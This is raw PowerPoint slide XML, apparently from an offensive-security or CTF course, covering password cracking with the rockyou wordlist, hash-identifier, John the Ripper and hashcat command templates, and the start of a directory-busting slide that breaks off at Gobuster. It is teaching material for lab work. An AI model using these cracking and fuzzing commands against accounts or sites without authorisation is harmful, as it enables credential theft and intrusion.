        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="-299" r="513" b="56528"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5865310" y="3722150"/>
            <a:ext cx="5688059" cy="2445018"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BBE425D-D0DD-477B-A996-5CE66F01EBB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7834592" y="3321782"/>
            <a:ext cx="2651760" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>HTB - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1"/>
              <a:t>OpenAdmin</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C8DDD9E-6B6B-43D3-9967-F25E06704D27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6248400" y="1055200"/>
            <a:ext cx="1773979" cy="147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C6D417-D086-4673-9887-6B06844426AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5925737" y="3722149"/>
            <a:ext cx="2613352" cy="201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62143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C2D7-2868-43F5-8FA3-14F9C4D1D1D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>255</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{957FDD44-C950-4BF7-B38E-9DA0831D27D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password Cracking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11030385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4E4C9-F1F3-44EB-8A79-B4A2C3019718}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>256</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36267F68-4248-47AE-BDA0-47B00F25BC76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Wordlists</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54B04941-B9DA-4FDA-AB19-B0F7ABDC6C6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="11338560" cy="2971800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Primary wordlist for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OffSec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/CTFs: rockyou.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For the course: if </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rockyou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> doesn’t work, not meant to be cracked</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Comes in Kali by default, though zipped up</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gzip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> –d /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/share/wordlists/rockyou.txt.gz</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9303A2D-0094-4170-902B-371DA6FE3341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3191700" y="4343400"/>
            <a:ext cx="5808599" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="19053896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6F12B-2A46-46E1-AFAD-D54A7228C9EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>257</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{640ABE76-7190-4FB2-B9F1-0C3A60BF6D87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>hash-identifier</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B45EE0E-1D91-4118-9E23-81B4B1A32792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="11338560" cy="548640"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Helps identify hash types (needed for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hashcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32921130-AF57-4A71-ABF2-D88126B7972A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2985653" y="2101957"/>
            <a:ext cx="6220693" cy="3019846"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29973575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4EC67-24E3-48AC-A2EA-B93769CCB917}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>258</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A3D611B-71D0-4DD5-8955-419997B53B00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>john (short for John the Ripper)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73589714-9931-4358-A64E-00901F990BA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="11338560" cy="2651760"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CPU-based cracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Place hashes in a file, separated by new line (can also add </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>username:hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>john --wordlist=/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/share/wordlists/rockyou.txt [HASH_FILE]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--format=[HASH_TYPE] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" u="sng" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Optional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, it does a pretty good job guessing) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>--show [HASH_FILE]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A662D28-18BC-46AC-95D3-8FAE2956D0BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="4114800"/>
            <a:ext cx="8935697" cy="1943371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11733660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8C40E6-6DC4-457C-A79B-5CA2DDFDC9B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>259</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42A05D52-69C3-4C69-A1BA-8FC3226106EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hashcat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E1C6FB2-91FD-4EF9-AB9C-B2B8E591D500}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1371600"/>
            <a:ext cx="11338560" cy="1524000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Faster cracking, uses GPU</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Needs you to tell it what format – check the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hashcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> wiki for format IDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hashcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -a 0 -m [HASH_MODE] [PASSWORD_FILE] [WORDLIST]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B110C45-2EE5-42AE-BB11-4A3AD64648F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3309230" y="2819400"/>
            <a:ext cx="5407623" cy="3313741"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2"/>
          </a:solidFill>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{015749EA-096B-4A39-93B4-83DB12EA3B16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="6133141"/>
            <a:ext cx="6097772" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://hashcat.net/wiki/doku.php?id=example_hashes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="380795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DC8E95-941D-4305-8BD8-3444E002C0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202A917-3C96-48A1-A601-A5E48E3BE708}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Directory Busting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D1C19D5-D6CC-452F-973F-6952CFD78A20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295400"/>
            <a:ext cx="11363325" cy="5174326"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You don’t often know exactly how a website is laid out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fuzz it! </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Main options:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Gobuster</a:t>
            </a:r>
            <a:r>
